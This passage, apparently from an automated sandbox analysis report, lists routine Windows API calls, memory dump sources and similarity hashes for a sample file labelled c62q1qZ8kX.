                • GetLastError.KERNEL32 ref: 001D98A8
                • GetLastError.KERNEL32 ref: 001D98C7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 2a99b46eb4a3762495b33d5107c3f872caf33df46af841b8d7b91bccdca06126
                • Instruction ID: ffba51440297b8f1d148090911f73ee3bc7942e62d976897a0484cfebd59f76a
                • Opcode Fuzzy Hash: 2a99b46eb4a3762495b33d5107c3f872caf33df46af841b8d7b91bccdca06126
                • Instruction Fuzzy Hash: 89118E3090020CEFDB249B55D808A7A77ADFB16B31F10C52BF86A86790D7759E40AF51
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001F3713,00000000,00000000,?,001FA49B,001F3713,00000000,00000000,00000000,?,001FA698,00000006,FlsSetValue), ref: 001FA526
                • GetLastError.KERNEL32(?,001FA49B,001F3713,00000000,00000000,00000000,?,001FA698,00000006,FlsSetValue,00207348,00207350,00000000,00000364,?,001F9077), ref: 001FA532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,001FA49B,001F3713,00000000,00000000,00000000,?,001FA698,00000006,FlsSetValue,00207348,00207350,00000000), ref: 001FA540
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: cde9f59d356fe0e4b606d2b804b113b54d762d8401b6c3667e5c0796d1a8cf9c
                • Instruction ID: 729d5653f51ecb63a306fc476cf4a864abae917ad75092cc63bce0bbec04f633
                • Opcode Fuzzy Hash: cde9f59d356fe0e4b606d2b804b113b54d762d8401b6c3667e5c0796d1a8cf9c
                • Instruction Fuzzy Hash: 1E01FCB671132AABC7218B68BC48A76779CAF45BA17510520FA0ED7251D735D900C6E1
                APIs
                  • Part of subcall function 001F8FA5: GetLastError.KERNEL32(?,00210EE8,001F3E14,00210EE8,?,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F8FA9
                  • Part of subcall function 001F8FA5: _free.LIBCMT ref: 001F8FDC
                  • Part of subcall function 001F8FA5: SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F901D
                  • Part of subcall function 001F8FA5: _abort.LIBCMT ref: 001F9023
                  • Part of subcall function 001FB2AE: _abort.LIBCMT ref: 001FB2E0
                  • Part of subcall function 001FB2AE: _free.LIBCMT ref: 001FB314
                  • Part of subcall function 001FAF1B: GetOEMCP.KERNEL32(00000000,?,?,001FB1A5,?), ref: 001FAF46
                • _free.LIBCMT ref: 001FB200
                • _free.LIBCMT ref: 001FB236
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID:
                • API String ID: 2991157371-771276903
                • Opcode ID: a17118522f3e3726117761dba8286f33821f01a8b4cdfade66eb2f204cd08fe4
                • Instruction ID: f4cd4a2523ec0e41599bfcbfbbbfa2b703412fe9b08bf433658c739e4438998d
                • Opcode Fuzzy Hash: a17118522f3e3726117761dba8286f33821f01a8b4cdfade66eb2f204cd08fe4
                • Instruction Fuzzy Hash: 3531D93190820CAFDB10EFA9D885B7DB7F5EF55320F254099F6149B291DB716D41CB50
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,001DCC94,00000001,?,?,?,00000000,001E4ECD,?,?,?), ref: 001D9F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,001E4ECD,?,?,?,?,?,001E4972,?), ref: 001D9F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,001DCC94,00000001,?,?), ref: 001D9FB8
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: cea05fb7a6cf57289b3bc2deef39ed33abd7406d7577e8f26f6f4a1ca758b63e
                • Instruction ID: 79850ee74ff86313ee45bb6f47e19f3407b52c868f6c634b8faa2e6472e1de4e
                • Opcode Fuzzy Hash: cea05fb7a6cf57289b3bc2deef39ed33abd7406d7577e8f26f6f4a1ca758b63e
                • Instruction Fuzzy Hash: AF31E0712083059BDF24DF24D848B6ABFA9EF90710F04465AF945DB381CB74ED48CBA2
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA261
                • GetLastError.KERNEL32(?,?,?,?,001DA113,?,00000001,00000000,?,?), ref: 001DA27E
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 198ee0ce48ebfe30eadee02a6de6ce55bd7a589512ec25b2f29f0234737a3c76
                • Instruction ID: 50949d4d01a2877ef1d9975ef090e594b60dbaf841a6ccc9ad83316724bcbe6f
                • Opcode Fuzzy Hash: 198ee0ce48ebfe30eadee02a6de6ce55bd7a589512ec25b2f29f0234737a3c76
                • Instruction Fuzzy Hash: BF01D831181214A6DF32EBB65C49BEE374CAF16791F844457F801D5251DB66CA41C6B3
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 001FB019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: 1b4afbf43f9741ffe66dbec709ef878a0d86aff663f49b4629666e6095bd94cd
                • Instruction ID: df9716fccc84c1c68954ec78da215dfc8a46481fb9825fa9402829e43519f475
                • Opcode Fuzzy Hash: 1b4afbf43f9741ffe66dbec709ef878a0d86aff663f49b4629666e6095bd94cd
                • Instruction Fuzzy Hash: B94126B050C38C9ADF258A24DCD4AFBBBBEDB55304F2404ECE69A87142D7359A45CF60
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 001FA79D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: 1ba34f439c54f57a94047b87a20a046d7127b1c0cb51a553318238816df9f342
                • Instruction ID: 7f4e19e9e7cacbdbef9661e894e6c0ba722d3ba1334bd87f80978b9812fa30e6
                • Opcode Fuzzy Hash: 1ba34f439c54f57a94047b87a20a046d7127b1c0cb51a553318238816df9f342
                • Instruction Fuzzy Hash: E901447250020CBBCF12AFA0EC06DEE3F66EF18760F454254FE1826161CB369A31EB91
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,001F9D2F), ref: 001FA715
                Strings
                • InitializeCriticalSectionEx, xrefs: 001FA6E5
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: e45b41d63fffc0a6625cb4fbb4d9c9236a482e382fe0e611250902a9168b5670
                • Instruction ID: 185700a828f5d70e52474ed3512c4e744e4ea3cebc668a3617f882792e33df0b
                • Opcode Fuzzy Hash: e45b41d63fffc0a6625cb4fbb4d9c9236a482e382fe0e611250902a9168b5670
                • Instruction Fuzzy Hash: 7FF02470A4431CBBCB006F10DC09CAE7F65EF05720B408154FD0816262CB325E20EB90
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: 9ffd869feaafffca45b91d5c8ddbd10cb5ecefbb2df9a46cfec4ff08d3d153d4
                • Instruction ID: 4da79007df6b1a374d36f33769353ff43acfb2afe56274bb3c5c5cdd6d8fdeb5
                • Opcode Fuzzy Hash: 9ffd869feaafffca45b91d5c8ddbd10cb5ecefbb2df9a46cfec4ff08d3d153d4
                • Instruction Fuzzy Hash: CBE0ABB0B5533C6FD314AB60AC0ACBEBB98CF66710B810154FC0817282CF751E109AD6
                APIs
                • try_get_function.LIBVCRUNTIME ref: 001F32AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: d6f5d1019d4402062140ff219a309161eaa97558102bfd5da8a92caaa0297cf8
                • Instruction ID: b439e31c01fe57c27302922b522460268b016a93bd7445b3996f3d21ea7a2497
                • Opcode Fuzzy Hash: d6f5d1019d4402062140ff219a309161eaa97558102bfd5da8a92caaa0297cf8
                • Instruction Fuzzy Hash: 37D05B31781B796AD71132D56C039BFBE4C8702FF5F450252FF0C5A5C3966649604DD5
                APIs
                • ___delayLoadHelper2@8.DELAYIMP ref: 001EE20B
                  • Part of subcall function 001EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001EDFD6
                  • Part of subcall function 001EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001EDFE7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                • String ID: 3Ro
                • API String ID: 1269201914-1492261280
                • Opcode ID: 8782d90b5d5a7dc33bc38252f303055974878786da1ad2610b36f750ed7bb153
                • Instruction ID: cb7c6283e864534f4d1a96bfaad4efe8c8812877b8981a3534f67f09d1b6838b
                • Opcode Fuzzy Hash: 8782d90b5d5a7dc33bc38252f303055974878786da1ad2610b36f750ed7bb153
                • Instruction Fuzzy Hash: 8DB012E127E542BC330C5102BE06C3E031CC4D1B50370C01AB305D40C19780DC1E4032
                APIs
                  • Part of subcall function 001FAF1B: GetOEMCP.KERNEL32(00000000,?,?,001FB1A5,?), ref: 001FAF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,001FB1EA,?,00000000), ref: 001FB3C4
                • GetCPInfo.KERNEL32(00000000,001FB1EA,?,?,?,001FB1EA,?,00000000), ref: 001FB3D7
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: f4b7aef2093a9706fe7a07ed457ac68ef7bdb3605755cdbec1e20aa836bf7529
                • Instruction ID: 3606a0b4e15f1841f969edb10375e4c9d60a8f3a69f191b439972e39c5b38dc5
                • Opcode Fuzzy Hash: f4b7aef2093a9706fe7a07ed457ac68ef7bdb3605755cdbec1e20aa836bf7529
                • Instruction Fuzzy Hash: F75157B0A0830D9EDB24DF35C8D06BABBE5EF51310F18846ED2878B253D7399942CB90
                APIs
                • __EH_prolog.LIBCMT ref: 001D1385
                  • Part of subcall function 001D6057: __EH_prolog.LIBCMT ref: 001D605C
                  • Part of subcall function 001DC827: __EH_prolog.LIBCMT ref: 001DC82C
                  • Part of subcall function 001DC827: new.LIBCMT ref: 001DC86F
                  • Part of subcall function 001DC827: new.LIBCMT ref: 001DC893
                • new.LIBCMT ref: 001D13FE
                  • Part of subcall function 001DB07D: __EH_prolog.LIBCMT ref: 001DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: ba36ebfcc2eb4f4d654d054ac6d446b6e46409030a8cbd53b1da2db7e80ec5a7
                • Instruction ID: 09aa26c5bdb7644a82a44d1cd0b2d2e3bbfa9a563fd21b4105194438d41e4816
                • Opcode Fuzzy Hash: ba36ebfcc2eb4f4d654d054ac6d446b6e46409030a8cbd53b1da2db7e80ec5a7
                • Instruction Fuzzy Hash: 324116B0905B40AED724DF7984859E7FBE5FF28300F504A2ED6EE83282DB326554CB11
                APIs
                • __EH_prolog.LIBCMT ref: 001D1385
                  • Part of subcall function 001D6057: __EH_prolog.LIBCMT ref: 001D605C
                  • Part of subcall function 001DC827: __EH_prolog.LIBCMT ref: 001DC82C
                  • Part of subcall function 001DC827: new.LIBCMT ref: 001DC86F
                  • Part of subcall function 001DC827: new.LIBCMT ref: 001DC893
                • new.LIBCMT ref: 001D13FE
                  • Part of subcall function 001DB07D: __EH_prolog.LIBCMT ref: 001DB082
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 7d257c746bd926a7491de3dbb0c2d9423b29d215f91c4843401a097ddb8e7297
                • Instruction ID: 99fcd0b90925e1b400a29c5c28c6d7835c128700fa3fd4f0c6c18bd126f00ad3
                • Opcode Fuzzy Hash: 7d257c746bd926a7491de3dbb0c2d9423b29d215f91c4843401a097ddb8e7297
                • Instruction Fuzzy Hash: 104115B0905B40AEE724DF7984859E7FBE5FF29300F504A2ED6EE83282DB326554CB15
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,001D9EDC,?,?,001D7867), ref: 001D97A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,001D9EDC,?,?,001D7867), ref: 001D97DB
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 82f603a816a20a824556b65cc72f14692657afaf4222f497778d8df473d9f390
                • Instruction ID: d66647332583515a11205ed6307e54d71b6ebfd88a69616d8a4266482c017d79
                • Opcode Fuzzy Hash: 82f603a816a20a824556b65cc72f14692657afaf4222f497778d8df473d9f390
                • Instruction Fuzzy Hash: BE21F6B1514749AFD7308F64C885BA777E8EB49764F00492EF5E682291C374AC458F61
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,001D7547,?,?,?,?), ref: 001D9D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 001D9E2C
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: 56ff42577362588aeb93a2b03d662e9161d3869ddfd5b1ec4f718e23faac859b
                • Instruction ID: f1b23cf43bbff6186ca072facb2f9df7e8b1238a5803cac9f9c4179f9da295f7
                • Opcode Fuzzy Hash: 56ff42577362588aeb93a2b03d662e9161d3869ddfd5b1ec4f718e23faac859b
                • Instruction Fuzzy Hash: 0821D631158786ABC715DE65C451AABBBE5AF55704F04081EF4D187241D329DA0CDB61
                APIs
                • GetProcAddress.KERNEL32(00000000,?), ref: 001FA4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001FA4C5
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: 8292739308ad11921e13b8ae6709a812dd3c20e7d03216dab045a4071a593da2
                • Instruction ID: 78552a868fd60969e7c33f02018293fa30ff37e2515a8252c9932d79c1e57435
                • Opcode Fuzzy Hash: 8292739308ad11921e13b8ae6709a812dd3c20e7d03216dab045a4071a593da2
                • Instruction Fuzzy Hash: 041127B36016288BDF25DE28FC4887A73999F8032075F4120EF19AB245DB78DC41C6D2
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,001D9B35,?,?,00000000,?,?,001D8D9C,?), ref: 001D9BC0
                • GetLastError.KERNEL32 ref: 001D9BCD
                Memory Dump Source
